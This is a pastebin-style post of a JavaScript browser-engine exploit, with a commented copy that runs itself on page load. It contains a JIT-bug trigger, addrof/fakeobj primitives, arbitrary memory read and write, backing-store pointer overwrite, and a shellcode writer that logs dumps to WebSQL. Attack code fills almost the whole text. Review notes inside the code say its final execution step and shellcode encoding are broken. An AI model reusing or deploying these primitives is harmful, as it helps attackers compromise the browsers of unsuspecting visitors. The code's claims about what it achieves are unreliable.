xosski

Javascript SQL/DB Exploit

Dec 28th, 2024
// Scratch buffers shared by the whole script.
// NOTE(review): nothing here makes `executableBuffer` executable — an ArrayBuffer's
// backing store is ordinary writable heap memory; the name states intent, not a property.
var executableBuffer = new ArrayBuffer(0x1000);
var dataView = new DataView(executableBuffer); // unused in this listing; copy_shellcode builds its own DataView

// 8-byte scratch area viewed both as one double and as two uint32 halves.  ftoi/itof use it to
// reinterpret a double's bit pattern; they treat u64_buf[0] as the low 32 bits (little-endian host assumed).
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
// Victim buffer whose backing-store pointer copy_shellcode overwrites (0x150 bytes caps how much it can write).
let buf2 = new ArrayBuffer(0x150);
  8.  
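/**
 * Opens the WebSQL database the script uses as a log and creates its two tables.
 *
 * WebSQL (`openDatabase`) is deprecated, was removed from Chromium (119 and later) and never
 * existed in Firefox, so on a current browser the original code died with a bare ReferenceError
 * on its first line.  Check for the API explicitly and fail with a message that says why.
 *
 * @returns {Database} the opened WebSQL database handle
 * @throws {Error} when `openDatabase` is not available in this environment
 */
function initSQLDatabase() {
  if (typeof openDatabase !== 'function') {
    throw new Error('WebSQL openDatabase() is not available in this browser');
  }
  const db = openDatabase('iu14D2N_SQL', '1.0', 'Memory Database', 2 * 1024 * 1024);

  // Schema is created lazily; executeSql with a literal statement and no user input here.
  db.transaction(function (tx) {
    tx.executeSql('CREATE TABLE IF NOT EXISTS memory_dumps (addr TEXT, data TEXT)');
    tx.executeSql('CREATE TABLE IF NOT EXISTS shellcode (id TEXT, payload BLOB)');
  });
  return db;
}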
  18.  
/**
 * Reinterprets the bit pattern of a double as an unsigned 64-bit BigInt.
 * Goes through the shared f64_buf/u64_buf views; u64_buf[0] is taken as the low half,
 * which is only correct on a little-endian host.
 * @param {number} val
 * @returns {bigint}
 */
function ftoi(val) {
  f64_buf[0] = val;
  const lo = BigInt(u64_buf[0]);
  const hi = BigInt(u64_buf[1]);
  return (hi << 32n) | lo;
}
  23.  
/**
 * Inverse of ftoi: stores a 64-bit BigInt's low and high 32-bit halves into the shared
 * scratch views and reads the result back as a double (little-endian host assumed).
 * Bits above 64 are dropped by the uint32 stores.
 * @param {bigint} val
 * @returns {number}
 */
function itof(val) {
  const lo = val & 0xffffffffn;
  const hi = val >> 32n;
  u64_buf.set([Number(lo), Number(hi)]);
  return f64_buf[0];
}
  29.  
// Single-element typed array holding 2^31.  foo() reads it through `^ 0`, which applies ToInt32,
// so the value wraps to -2^31 there; the whole arithmetic chain in foo() is built around that.
const _arr = new Uint32Array([2**31]);
  31.  
/**
 * JIT trigger.  Evaluated normally the chain is: (2^31 ^ 0) = -2147483648, +1 = -2147483647,
 * abs = 2147483647, -2147483647 = 0, max(0,0) = 0, -1 = -1, and the guard turns -1 into 0,
 * so `arr` is an empty array and shift() on it returns undefined.
 *
 * The caller warms this function up 0x3000 times and then relies on the optimizing compiler
 * mis-reasoning about the value range of x so that the optimized version creates `arr` with a
 * bogus length; on an engine without that bug `arr` is simply empty.  Which engine build / bug
 * this targets is not stated anywhere in the paste — TODO confirm before treating it as anything
 * but a historical PoC.  Do not "clean up" the arithmetic: the exact statement sequence is the point.
 *
 * @param {boolean} a unused; only distinguishes warm-up calls from the real one at the call site
 * @returns {[Array, number[]]} [arr, cor] — cor is allocated right after arr so addrof/fakeobj can
 *   read arr's out-of-bounds slots back through cor (presumably; layout not verifiable here).
 */
function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;
x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);
x -= 1;
if(x==-1) x = 0;
var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];
return [arr, cor];
}
  45.  
/**
 * Reads `length` consecutive addresses starting at startAddr through arbread().
 * Each entry is whatever arbread returns for startAddr + i, i.e. the 8-byte read at that
 * address interpreted as a double — it is not a byte, and consecutive reads overlap.
 * Never called in this listing.
 * @param {bigint} startAddr
 * @param {number|bigint} length number of 1-byte steps; must be convertible by BigInt()
 * @returns {number[]}
 */
function readMemoryRegion(startAddr, length) {
  const count = Number(BigInt(length));
  const result = Array.from({ length: count }, (_, i) =>
    Number(arbread(startAddr + BigInt(i))));
  console.log("[+] Memory region read from", startAddr.toString(16));
  return result;
}
  54.  
/**
 * Dumps `size` bytes starting at addr as a list of 8-byte reads (one arbread per qword).
 * Values are the raw doubles arbread returns; a caller wanting integers must run them through ftoi().
 * @param {bigint} addr
 * @param {number|bigint} size byte count; the last partial qword is still read in full
 * @returns {number[]}
 */
function dumpMemoryRegion(addr, size) {
  const limit = addr + BigInt(size);
  const memData = [];
  let cursor = addr;
  while (cursor < limit) {
    memData.push(arbread(cursor));
    cursor += 8n;
  }
  console.log("[+] Memory dump at", addr.toString(16), ":", memData);
  return memData;
}
  64.  
/**
 * Dumps a memory region and records it in the memory_dumps table.
 * The insert is parameterized (addr as hex text, data as a JSON array of doubles); note that
 * JSON.stringify turns NaN/Infinity doubles into null, so such reads are lost in the stored copy.
 * @param {bigint} addr
 * @param {number|bigint} size
 * @param {Database} db WebSQL handle from initSQLDatabase()
 * @returns {number[]} the dumped values, same as dumpMemoryRegion()
 */
function dumpMemoryRegionToSQL(addr, size, db) {
  const memData = dumpMemoryRegion(addr, size);
  const row = [addr.toString(16), JSON.stringify(memData)];
  db.transaction(function (tx) {
    tx.executeSql('INSERT INTO memory_dumps (addr, data) VALUES (?, ?)', row);
  });
  return memData;
}
  73.  
/**
 * Records the shellcode word list in the shellcode table under a fixed id.
 * The array is passed as a bound parameter; WebSQL has no native array type, so what ends up
 * in the BLOB column is presumably the array's string form, not raw bytes — confirm if it matters.
 * @param {Database} db WebSQL handle from initSQLDatabase()
 * @param {number[]} shellcode
 */
function storeShellcode(db, shellcode) {
  const insert = 'INSERT INTO shellcode (id, payload) VALUES (?, ?)';
  const params = ['iu14D2N_shellcode', shellcode];
  db.transaction(function (tx) {
    tx.executeSql(insert, params);
  });
}
  80.  
// ---- trigger + corruption; runs at script load, not from executeExploit ----
// Warm foo() up so the optimizing JIT compiles it: the PoC relies on the *optimized* version
// producing the oversized `arr` (see foo()).  0x3000 is an empirical iteration count.
for(var i=0;i<0x3000;++i)
foo(true);

var x = foo(false);
var arr = x[0]; // supposedly an array with a bogus length; length 0 on an unaffected engine
var cor = x[1]; // [1.1, 1.2, 1.3] allocated right after it; addrof/fakeobj read arr's slots back through it

const idx = 6;
// Out-of-bounds write through arr.  Presumably this overwrites a field of the adjacent `cor`
// (its length, judging by the cor[3] read further down) — TODO confirm against the engine layout.
// On an unaffected engine this is just an ordinary element write that grows arr to length 17.
arr[idx+10] = 0x4242;
  90.  
/**
 * Leaks the address of object k.
 * Stores k into arr[idx+1] and reads the same memory back as a double through cor[0], which only
 * works if arr's out-of-bounds slots overlap cor's element storage (what the corruption above is
 * meant to arrange).  Only the low 32 bits are returned, so the paste presumably targets a
 * 32-bit compressed-pointer layout — confirm.
 * @param {object} k
 * @returns {bigint} low 32 bits of the raw value
 */
function addrof(k) {
arr[idx+1] = k;
return ftoi(cor[0]) & 0xffffffffn;
}
  95.  
/**
 * Inverse of addrof: writes the raw value k into cor[0] as a double and reads the same slot back
 * as an object reference through arr[idx+1].  Same overlap assumption as addrof; k is used as-is,
 * so the caller is responsible for any tag bits the engine expects.
 * @param {bigint} k raw value to present as an object pointer
 * @returns {object} whatever the engine interprets at that address
 */
function fakeobj(k) {
cor[0] = itof(k);
return arr[idx+1];
}
  100.  
// cor has three elements, so cor[3] is an out-of-bounds read (only possible if its length was
// corrupted above); the value is presumably the map / shape word of a double array — TODO confirm.
var float_array_map = ftoi(cor[3]);

// arr2's element storage is used as the body of a fake object: element 0 carries the leaked map,
// element 1 is rewritten by arbread/arbwrite.  addrof(arr2) + 0x20 is assumed to be the address of
// that element storage; the offset is build-specific and not established by anything in this file.
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);
  105.  
/**
 * Reads 8 bytes at `addr` through the fake object.
 * The address is forced odd (presumably a pointer tag bit — confirm), then (2 << 32) | (addr - 8)
 * is written into arr2[1], the slot right after the map in arr2[0], and fake[0] is read as a
 * double.  That slot presumably holds the fake array's elements pointer (low dword) and length
 * (high dword = 2) — TODO confirm against the targeted engine's object layout.
 * NOTE(review): only addresses below 2^32 fit; anything larger spills into the length dword.
 * @param {bigint} addr
 * @returns {number} the qword as a double; run it through ftoi() for the raw bits
 */
function arbread(addr) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
return (fake[0]);
}
  113.  
/**
 * Writes 8 bytes at `addr` through the fake object; same slot setup as arbread().
 * The value is stored as a double, so bit patterns that are NaN may be canonicalised by the
 * engine on the way through — keep that in mind for arbitrary 64-bit values.
 * @param {bigint} addr same 32-bit limitation as arbread()
 * @param {bigint|number} val written as the raw 64-bit pattern BigInt(val)
 */
function arbwrite(addr, val) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
fake[0] = itof(BigInt(val));
}
  121.  
/**
 * Writes the `shellcode` word list to raw address `addr`.
 * Overwrites the pointer 0x14 bytes past buf2's address — presumably buf2's backing-store pointer
 * (build-specific; TODO confirm) — so that a DataView over buf2 writes to `addr` instead.
 * Each entry is stored as a little-endian uint32 at 4*i, so byte-sized entries (0xB8, 0x50, ...)
 * are zero-padded to four bytes.  The DataView still believes the buffer is 0x150 bytes, so more
 * than 0x54 entries throws RangeError.
 * NOTE(review): an ArrayBuffer backing store is ordinary non-executable heap memory — this is a
 * write primitive, not code execution.
 * @param {bigint} addr
 * @param {number[]} shellcode 32-bit words
 */
function copy_shellcode(addr, shellcode) {
let dataview = new DataView(buf2);
let buf_addr = addrof(buf2);
let backing_store_addr = buf_addr + 0x14n;
arbwrite(backing_store_addr, addr);

for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
  132.  
/**
 * Driver.  Steps, in order:
 *   1. open the WebSQL log database — throws on any browser without openDatabase, which aborts
 *      everything below before a single memory access;
 *   2. take addrof(executableBuffer) + 0x20 as the write target (whether that offset is the
 *      backing-store pointer or inline data is not established by this file);
 *   3. dump 0x100 bytes from there into memory_dumps;
 *   4. store the word list in the DB and write it to the target via copy_shellcode;
 *   5. attempt to "call" the address.
 *
 * NOTE(review): step 5 cannot work as written.  `new Function('return ' + exec_addr)()` merely
 * evaluates to a Number, so `execFunc()` throws TypeError ("execFunc is not a function"), which
 * the top-level `.catch` logs as "[!] Exploit failed".  `new Function` is eval-equivalent and is
 * also blocked by any CSP without 'unsafe-eval'.  Declared async but awaits nothing.
 */
async function executeExploit() {
let db = initSQLDatabase();
var exec_addr = addrof(executableBuffer) + 0x20n;
console.log("[+] Address of executable region: " + exec_addr.toString(16));

dumpMemoryRegionToSQL(exec_addr, 0x100, db);

// Mixed-width entries: each one is written as a 32-bit little-endian word by copy_shellcode, so the
// single-byte values get three zero bytes of padding and the bytes in memory are not the instruction
// stream the hex values suggest.  Treat it as placeholder data.
let shellcode = [
0x90909090,
0x68434241,
0x6A00,
0xB8,
0x89E5,
0x31C0,
0x50,
0x89E2,
0x31C9,
0xB0FF,
0xC3
];

storeShellcode(db, shellcode);
copy_shellcode(exec_addr, shellcode);

let execFunc = new Function('return ' + exec_addr)();
execFunc();
}
  160.  
/**
 * Thin wrapper around executeExploit() that brackets it with two log lines.
 * The completion line is only reached on success; a rejection propagates to the caller.
 * @returns {Promise<void>}
 */
async function executeCustomExploit() {
  console.log("[+] Starting iu14D2N exploit with SQL capabilities...");
  const run = executeExploit();
  await run;
  console.log("[+] Exploit and SQL operations completed");
}
  166.  
  167. executeCustomExploit().catch(error => {
  168. console.log("[!] Exploit failed:", error);
  169. });
  170.  
Comments
  • xosski
// First trigger: run once the DOM is parsed.  `executeCustomExploit` is the global the IIFE below
// attaches to window; the IIFE runs synchronously at load, so it exists before the event fires.
// NOTE(review): window.onload at the end of the file calls it again, so executeExploit runs twice.
document.addEventListener('DOMContentLoaded', async () => {
  try {
    await executeCustomExploit();
  } catch (error) {
    console.log("[!] Exploit failed:", error);
  }
});
    6.  
// Same PoC as the main paste, wrapped in an IIFE so that only `window.executeCustomExploit` escapes.
// NOTE(review): the heap-corruption steps (warm-up loop, arr/cor, the arr[idx+10] write, fakeobj)
// still run synchronously inside this IIFE at script load, before either DOM trigger fires.
(function() {
  // Scratch buffers.  An ArrayBuffer's backing store is ordinary writable heap memory; nothing
  // here makes `executableBuffer` executable.  `dataView` is unused.
  var executableBuffer = new ArrayBuffer(0x1000);
  var dataView = new DataView(executableBuffer);

  // 8-byte scratch reinterpreted as one double or two uint32 halves by ftoi/itof (little-endian assumed).
  var buf = new ArrayBuffer(8);
  var f64_buf = new Float64Array(buf);
  var u64_buf = new Uint32Array(buf);
  let buf2 = new ArrayBuffer(0x150); // victim buffer whose backing-store pointer copy_shellcode overwrites

  // Opens the deprecated WebSQL database used as a log.  Where openDatabase does not exist (current
  // Chromium, Firefox) this throws ReferenceError and executeExploit aborts before any memory access.
  function initSQLDatabase() {
  let db = openDatabase('iu14D2N_SQL', '1.0', 'Memory Database', 2 * 1024 * 1024);

  db.transaction(function (tx) {
  tx.executeSql('CREATE TABLE IF NOT EXISTS memory_dumps (addr TEXT, data TEXT)');
  tx.executeSql('CREATE TABLE IF NOT EXISTS shellcode (id TEXT, payload BLOB)');
  });
  return db;
  }

  // double -> raw 64-bit pattern as BigInt (u64_buf[0] taken as the low half).
  function ftoi(val) {
  f64_buf[0] = val;
  return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
  }

  // raw 64-bit pattern -> double; bits above 64 are dropped by the uint32 stores.
  function itof(val) {
  u64_buf[0] = Number(val & 0xffffffffn);
  u64_buf[1] = Number(val >> 32n);
  return f64_buf[0];
  }

  // 2^31: foo() reads it through `^ 0` (ToInt32), so it wraps to -2^31 there.
  const _arr = new Uint32Array([2**31]);

  // JIT trigger.  Evaluated normally x ends up 0 and `arr` is empty; the PoC relies on the optimized
  // compile of this exact statement sequence mis-reasoning about x's range so that `arr` gets a bogus
  // length.  Target engine/bug is not stated in the paste — TODO confirm.  `a` is unused.
  function foo(a) {
  var x = 1;
  x = (_arr[0] ^ 0) + 1;
  x = Math.abs(x);
  x -= 2147483647;
  x = Math.max(x, 0);
  x -= 1;
  if(x==-1) x = 0;
  var arr = new Array(x);
  arr.shift();
  var cor = [1.1, 1.2, 1.3];
  return [arr, cor];
  }

  // One arbread (a double, not a byte) per address in [startAddr, startAddr+length).  Unused here.
  function readMemoryRegion(startAddr, length) {
  let result = [];
  for(let i = 0n; i < BigInt(length); i++) {
  result.push(Number(arbread(startAddr + i)));
  }
  console.log("[+] Memory region read from", startAddr.toString(16));
  return result;
  }

  // `size` bytes from addr as a list of qword reads (raw doubles; ftoi() for the bits).
  function dumpMemoryRegion(addr, size) {
  let memData = [];
  for(let i = 0n; i < BigInt(size); i += 8n) {
  let value = arbread(addr + i);
  memData.push(value);
  }
  console.log("[+] Memory dump at", addr.toString(16), ":", memData);
  return memData;
  }

  // Dump + parameterized insert (addr as hex text, data as JSON; NaN/Infinity become null).
  function dumpMemoryRegionToSQL(addr, size, db) {
  let memData = dumpMemoryRegion(addr, size);
  db.transaction(function (tx) {
  tx.executeSql('INSERT INTO memory_dumps (addr, data) VALUES (?, ?)',
  [addr.toString(16), JSON.stringify(memData)]);
  });
  return memData;
  }

  // Records the word list under a fixed id; the array is bound as a parameter, so it is presumably
  // stored in its string form rather than as raw bytes.
  function storeShellcode(db, shellcode) {
  db.transaction(function (tx) {
  tx.executeSql('INSERT INTO shellcode (id, payload) VALUES (?, ?)',
  ['iu14D2N_shellcode', shellcode]);
  });
  }

  // Warm foo() up so the JIT compiles it, then take the (supposedly) corrupted arr and the
  // adjacent cor.  Runs at load time.
  for(var i=0;i<0x3000;++i)
  foo(true);

  var x = foo(false);
  var arr = x[0];
  var cor = x[1];

  const idx = 6;
  // Out-of-bounds write; presumably corrupts cor's length so cor[3] becomes readable — TODO confirm.
  // On an unaffected engine this is an ordinary element write that grows arr to length 17.
  arr[idx+10] = 0x4242;

  // Store k in arr's OOB slot, read it back as a double through cor[0]; low 32 bits only
  // (presumably a compressed-pointer target — confirm).
  function addrof(k) {
  arr[idx+1] = k;
  return ftoi(cor[0]) & 0xffffffffn;
  }

  // Inverse of addrof: raw value in via cor[0], object reference out via arr[idx+1].
  function fakeobj(k) {
  cor[0] = itof(k);
  return arr[idx+1];
  }

  // cor[3] is out of bounds for a 3-element array; presumably the map of a double array — confirm.
  var float_array_map = ftoi(cor[3]);

  // arr2's element storage doubles as a fake object body: [0] the leaked map, [1] rewritten by
  // arbread/arbwrite.  The +0x20 offset to that storage is build-specific and unverified here.
  var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
  var fake = fakeobj(addrof(arr2) + 0x20n);

  // 8-byte read at addr (forced odd — presumably a tag bit) via the fake object: arr2[1] gets
  // (2 << 32) | (addr - 8), presumably length 2 + elements pointer; result is a double.
  // Only addresses below 2^32 fit.
  function arbread(addr) {
  if (addr % 2n == 0) {
  addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  return (fake[0]);
  }

  // 8-byte write at addr with the same slot setup; value stored as a double (NaN patterns may be canonicalised).
  function arbwrite(addr, val) {
  if (addr % 2n == 0) {
  addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  fake[0] = itof(BigInt(val));
  }

  // Redirects buf2's (presumed) backing-store pointer at +0x14 to addr, then writes each entry as a
  // little-endian uint32 at 4*i — byte-sized entries are zero-padded.  More than 0x54 entries throws
  // RangeError because the DataView still believes the buffer is 0x150 bytes.
  // NOTE(review): the destination is ordinary heap memory, not executable memory.
  function copy_shellcode(addr, shellcode) {
  let dataview = new DataView(buf2);
  let buf_addr = addrof(buf2);
  let backing_store_addr = buf_addr + 0x14n;
  arbwrite(backing_store_addr, addr);

  for (let i = 0; i < shellcode.length; i++) {
  dataview.setUint32(4*i, shellcode[i], true);
  }
  }

  // Driver: open DB (throws where WebSQL is absent), dump 0x100 bytes at addrof(executableBuffer)+0x20,
  // store and write the word list, then try to "call" the address.
  // NOTE(review): `new Function('return ' + exec_addr)()` evaluates to a Number, so `execFunc()` throws
  // TypeError and the triggers log "[!] Exploit failed" — the final step cannot work as written.
  // `new Function` is also blocked by a CSP without 'unsafe-eval'.  Async but awaits nothing.
  async function executeExploit() {
  let db = initSQLDatabase();
  var exec_addr = addrof(executableBuffer) + 0x20n;
  console.log("[+] Address of executable region: " + exec_addr.toString(16));

  dumpMemoryRegionToSQL(exec_addr, 0x100, db);

  // Mixed-width entries, each written as a 32-bit word, so the bytes in memory are not the
  // instruction stream the hex values suggest; placeholder data.
  let shellcode = [
  0x90909090,
  0x68434241,
  0x6A00,
  0xB8,
  0x89E5,
  0x31C0,
  0x50,
  0x89E2,
  0x31C9,
  0xB0FF,
  0xC3
  ];

  storeShellcode(db, shellcode);
  copy_shellcode(exec_addr, shellcode);

  let execFunc = new Function('return ' + exec_addr)();
  execFunc();
  }

  // The only name exported from the IIFE; both the DOMContentLoaded listener above and window.onload
  // below call it, so executeExploit runs twice per page load.
  window.executeCustomExploit = async function() {
  console.log("[+] Auto-executing iu14D2N exploit...");
  await executeExploit();
  console.log("[+] Auto-execution completed");
  }
})();
    174.  
// Second trigger: re-runs the exploit on load (after the DOMContentLoaded run above).
// The returned promise is deliberately left unhandled here, as in the original — a failure
// surfaces as an unhandled rejection rather than a logged message.
const secondaryTrigger = () => {
  console.log("[+] Secondary trigger point activated");
  executeCustomExploit();
};
window.onload = secondaryTrigger;
    179.  